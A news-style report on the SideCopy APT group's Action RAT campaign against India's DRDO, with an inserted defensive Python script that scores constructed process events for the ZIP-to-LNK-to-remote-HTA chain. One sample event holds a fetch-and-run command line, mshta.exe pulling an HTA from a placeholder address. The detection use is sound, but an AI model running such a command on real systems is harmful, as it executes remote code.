Cybersecurity researchers have discovered a new malicious campaign aimed at deploying the ‘Action RAT’ malware against the Ministry of Defence in India. Investigations reveal that the campaign, attributed to the SideCopy APT group, follows a history of cyberattacks against Indian and Afghan organisations.
First detected in 2019, the Pakistani group SideCopy APT has been observed sharing tactics with the Transparent Tribe group. In this recent campaign, SideCopy targeted the research and development division of India’s Ministry of Defence – the Defence Research and Development Organization (DRDO).
SideCopy begins its Action RAT campaign with spear-phishing emails.
To gain initial access to a targeted machine, the threat operators send spear-phishing emails that carry a ZIP archive. This ZIP file contains an [.]LNK file masquerading as information about the K-4 ballistic missile developed by DRDO.
Once the victim launches the [.]LNK file on their computer, an HTML application is retrieved from the attackers’ remote server; it displays a decoy presentation while deploying Action RAT on the now compromised machine.
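As an added defender-side example that is not part of the original report, the following Python scores constructed process-creation events for the chain described above: a shortcut opened from an extracted ZIP that runs mshta.exe against a remote URL. The field names, file paths, lure file name and the TEST-NET address are all assumptions made for the sample.

```python
import re

# Constructed Sysmon-style process-creation events (not real telemetry).
# Event 0 mimics the ZIP -> LNK -> remote HTA chain; the others are benign
# lookalikes that a naive "any mshta.exe" rule would also flag.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe http://203.0.113.10/k4-brief.hta",   # constructed URL
     "cwd": r"C:\Users\analyst\AppData\Local\Temp\Temp1_K4_brief.zip"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" C:\Users\analyst\Documents\notes.docx',
     "cwd": r"C:\Users\analyst\Documents"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Tools\local_panel.hta",   # local HTA, no remote fetch
     "cwd": r"C:\Tools"},
]

# A remote HTA is the key signal: mshta.exe pulling a URL instead of a local file.
REMOTE_URL = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)
# Working directory inside a Windows Explorer ZIP extraction folder (Temp<N>_<name>.zip).
ARCHIVE_TEMP = re.compile(r"\\Temp\\Temp\d+_[^\\]*\.zip(?:\\|$)", re.IGNORECASE)


def score_event(ev):
    """Return a suspicion score for one process-creation event.

    2 points: mshta.exe launched with a remote URL on its command line.
    1 point : the process runs from a ZIP extraction folder.
    1 point : the parent is explorer.exe (a user double-click, e.g. on a
              shortcut), but only when an earlier signal already fired.
    """
    score = 0
    if ev["image"].lower().endswith(r"\mshta.exe") and REMOTE_URL.search(ev["cmdline"]):
        score += 2
    if ARCHIVE_TEMP.search(ev["cwd"]):
        score += 1
    if score and ev["parent"].lower().endswith(r"\explorer.exe"):
        score += 1
    return score


def find_suspicious(events, threshold=2):
    """Return the events whose score reaches the threshold."""
    return [ev for ev in events if score_event(ev) >= threshold]
```

The threshold keeps a locally launched HTA from an admin console out of the alert queue while the remote-fetch case still surfaces even if the extraction folder and parent checks miss.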
Aside from collecting data about the compromised machine, Action RAT also runs commands received from the attackers’ remote server, such as stealing sensitive files and dropping additional malware payloads to extend the infection.
During the infection process, a second stealer malware called AuTo Stealer is also deployed; it can gather data from MS Office files, PDF files, images, database files and text files and exfiltrate it over HTTP or TCP.
In December 2021, SideCopy was also found spreading Action RAT against numerous Afghan ministries and a government computer in India, leading to the theft of large sensitive databases. The APT group also attacked Indian government agencies in February, when it deployed a different malware strain called ReverseRAT.
Cybersecurity experts warn that this Pakistani APT group has continually upgraded its TTPs to inflict more effective and severe damage on its victims. Organisations are advised to safeguard their networks with robust security measures and to avoid opening files attached to suspicious emails.
